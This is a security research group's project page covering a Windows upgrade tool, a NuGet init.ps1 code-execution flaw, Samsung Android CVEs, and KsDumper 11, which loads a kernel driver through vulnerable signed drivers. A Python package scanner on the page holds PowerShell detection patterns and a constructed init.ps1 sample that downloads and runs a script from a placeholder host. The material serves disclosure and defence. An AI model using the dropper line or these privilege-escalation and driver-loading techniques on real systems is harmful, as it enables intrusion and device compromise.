Our Research

"Auto11" - A Prototype Windows In-place Upgrade Tool - (Dennis Nedry - 2024)

Stobaugh Group researcher Dainen Dunn is back at it again, this time with a tool that makes in-place upgrades of Windows 11 (even to an Insider release) a breeze.

 
Auto11 -- GitHub Link

 --Dennis Nedry

Microsoft Visual Studio NuGet RCE - (Dennis Nedry - 2024)

Stobaugh Group researcher Dainen Dunn discovered a vulnerability in the NuGet package manager that allows threat actors to weaponize NuGet packages. It leverages the init.ps1 feature: a PowerShell script shipped in a package's tools folder that Visual Studio's Package Manager Console runs automatically when the package is brought into a solution. People are actively exploiting this in the wild, and thousands of users have downloaded infected packages.

Upon installing an infected package, the script executes, but only the first time that package is installed after the project/solution has been opened. Subsequent installs in the same session do not run the script again.

Any version of Visual Studio from 2017 onward is affected, and potentially 2015 as well. The exact line of code that produces this behaviour is linked below. Removing that line prevents the package manager from executing the script, so the init.ps1 payload in an infected package no longer runs on install (this neutralizes the script vector only; a package's assemblies and other contents still need vetting).
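A developer-side check to complement the code-level fix above: since a .nupkg is a zip archive, a package can be inspected for install-time PowerShell scripts before it is ever restored into a solution. The following is an added example written for this page, not the Stobaugh Group PoC or NuGet's own code. The script names it looks for (init.ps1, install.ps1, uninstall.ps1 under tools/) are the ones NuGet executes; the triage patterns and the in-memory sample package, including the placeholder URL, are assumptions constructed for the example.

```python
import io
import re
import zipfile

# Scripts NuGet's Package Manager Console executes from a package's tools folder.
# init.ps1 runs once per solution session; install.ps1/uninstall.ps1 only apply to
# packages.config projects, but are worth flagging for the same reason.
SCRIPT_NAMES = {"init.ps1", "install.ps1", "uninstall.ps1"}

# Triage heuristics for the script body. This list is an assumption of the example,
# not an exhaustive indicator set; treat a hit as "read this script", not "malware".
SUSPICIOUS_PATTERNS = {
    "remote download": re.compile(
        r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Start-BitsTransfer", re.I),
    "dynamic execution": re.compile(
        r"Invoke-Expression|\biex\b|Invoke-Command|\bicm\b", re.I),
    "encoded payload": re.compile(
        r"FromBase64String|-EncodedCommand|\s-e(nc|c)\s", re.I),
    "process spawn": re.compile(
        r"Start-Process|\bsaps\b|cmd(\.exe)?\s+/c|rundll32|mshta|certutil", re.I),
    "inline compile": re.compile(r"Add-Type", re.I),
}


def list_install_scripts(nupkg):
    """Return {archive_path: script_text} for every tools/**/init|install|uninstall.ps1.

    nupkg may be a filesystem path or a binary file-like object (a .nupkg is a zip).
    """
    scripts = {}
    with zipfile.ZipFile(nupkg) as zf:
        for info in zf.infolist():
            path = info.filename.replace("\\", "/")
            parts = path.lower().split("/")
            if len(parts) >= 2 and parts[0] == "tools" and parts[-1] in SCRIPT_NAMES:
                # utf-8-sig strips the BOM that PowerShell scripts frequently carry.
                scripts[path] = zf.read(info).decode("utf-8-sig", errors="replace")
    return scripts


def triage_script(text):
    """Return the sorted list of heuristic labels that match the script body."""
    return sorted(label for label, rx in SUSPICIOUS_PATTERNS.items() if rx.search(text))


def scan_nupkg(nupkg):
    """Map each install-time script in the package to its triage labels.

    An empty dict means the package ships no script that Visual Studio would run;
    a script with an empty label list still deserves a manual read.
    """
    return {path: triage_script(text) for path, text in list_install_scripts(nupkg).items()}


def build_sample_nupkg(init_ps1=None):
    """Construct a minimal in-memory .nupkg for testing (constructed sample, not a real package)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("Example.Pkg.nuspec",
                    "<package><metadata><id>Example.Pkg</id>"
                    "<version>1.0.0</version></metadata></package>")
        zf.writestr("lib/net45/Example.Pkg.dll", b"MZ")  # placeholder assembly bytes
        if init_ps1 is not None:
            zf.writestr("tools/init.ps1", init_ps1)
    buf.seek(0)
    return buf


# Constructed init.ps1 resembling a download-and-execute dropper; the URL is a placeholder.
SAMPLE_MALICIOUS_INIT = (
    "param($installPath, $toolsPath, $package, $project)\n"
    "$u = 'http://example.invalid/stage2.ps1'\n"
    "IEX ((New-Object Net.WebClient).DownloadString($u))\n"
)

if __name__ == "__main__":
    print("clean:   ", scan_nupkg(build_sample_nupkg()))
    print("infected:", scan_nupkg(build_sample_nupkg(SAMPLE_MALICIOUS_INIT)))
```

To check a real package, pass the path of a downloaded .nupkg to scan_nupkg() before restoring it. The scan only sees what is inside the archive; it says nothing about what a script would fetch at run time, which is exactly why any package that ships an install-time script is worth reading in full rather than trusting a clean heuristic result.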


NuGet RCE PoC -- GitHub

 --Dennis Nedry

CVE-2023-30731 "combo-kill" - (K0mraid - 2023)


CVE-2023-30731 is a critical vulnerability in Samsung's Android operating system discovered by researcher Cody "K0mraid" Stobaugh. It allows a physical attacker to install an application with a different build type than the one the device is currently running. This lets an attacker install malicious packages that could lead to local root access on the device, sensitive data exposure, keylogging, hidden call recording, and control of the device at a firmware level that is normally accessible only on engineering or development devices.

This was validated by installing non-production packages, exploiting a vulnerability present on Samsung Android devices released before 2024 in how they handle package installation and package signatures. The vulnerability itself lies in one of Samsung's proprietary security controls, AASA/ASKS.

Samsung released a patch for the vulnerability in the October 2023 Security Maintenance Release (SMR).

Links
Samsung Security Blog
NVD

 --K0mraid

KsDumper 11 - (Dennis Nedry - 2023)

KsDumper has been a game-changer for reverse engineers since it first appeared on GitHub. Its primary goal is to dump a running program from memory to disk in its entirety. However, once the exploit used to load the KsDumper driver was patched, the program became incompatible with most up-to-date systems, leaving many users stuck with outdated software.

This is where KsDumper 11 comes in. Stobaugh Group's Dainen Dunn has replaced the patched Capcom driver exploit used in the original KsDumper with Kernel Driver Utility (KDU). KDU exploits vulnerabilities in various signed kernel drivers to load the KsDumper driver, resulting in improved compatibility with updated systems, including Windows 11.

With KsDumper 11, users can unload the driver without restarting the computer. Additionally, the .NET client app has had a complete UI makeover, with a sleek, customizable WinForms dark mode. It also adds auto-refresh and auto-dump of a selected .exe, as well as the ability to suspend, resume, and kill selected processes from a right-click menu.

Active development is ongoing to address challenges KsDumper 11 may present, such as edge cases where KDU is unable to load the driver. Dainen's top priority was compatibility with a wide range of systems. He welcomes feedback from users and has created a Discord server, linked from the GitHub repo, where users can share their thoughts and suggestions.

At its core, KsDumper 11 aims to make dumping running programs simpler and more accessible for reverse engineers.

Links

KsDumper 11 GitHub Repo

--Dennis Nedry

AOSP "Package-Manager" Flaw aka "system shell" - (K0mraid - 2022)


Way back in 2019, a vulnerability that would come to be known as CVE-2019-16253 was found that affected Samsung's TTS engine in versions prior to 3.0.02.7. It allowed a local attacker to escalate privileges to system, and it was later patched by Samsung.

Essentially, Samsung's TTS app would blindly accept any data it received from the TTS engine. An attacker can pass the TTS engine a library that is then handed to the TTS application, which loads and executes it with system privileges (UID 1000 on Android). This was later patched so that the TTS app verifies both the data coming from the engine and the engine version installed, closing this particular loophole.

However, with Android 10, Google introduced the ability to roll back an application by installing it with the ENABLE_ROLLBACK parameter. This allows the user to revert an app installed on the device to a previously installed version. I believe an oversight has allowed this to extend to Samsung's text-to-speech application, as well as any application on any Android 10+ device currently in the wild.

The root of this kill chain comes back to the '-d' flag passed to the package-manager (pm) install command. It should only work for debuggable apps, but it works for non-debuggable applications as well, which is why the TTS app can be forcibly downgraded.

In other words, while the 2019 exploit was fixed and an updated version of the TTS app was distributed, first one, and now multiple, workarounds and bypasses to install and exploit it on devices released three (and perhaps four) years later have been discovered, raising questions about how many past exploits are revivable.

In March, Samsung released a patch for the exploit; however, I was able to quickly find a workaround for the March Samsung patch, and this has since been reported and patched as well, concluding the two-year saga of the infamous "TTS System Shell".

 --K0mraid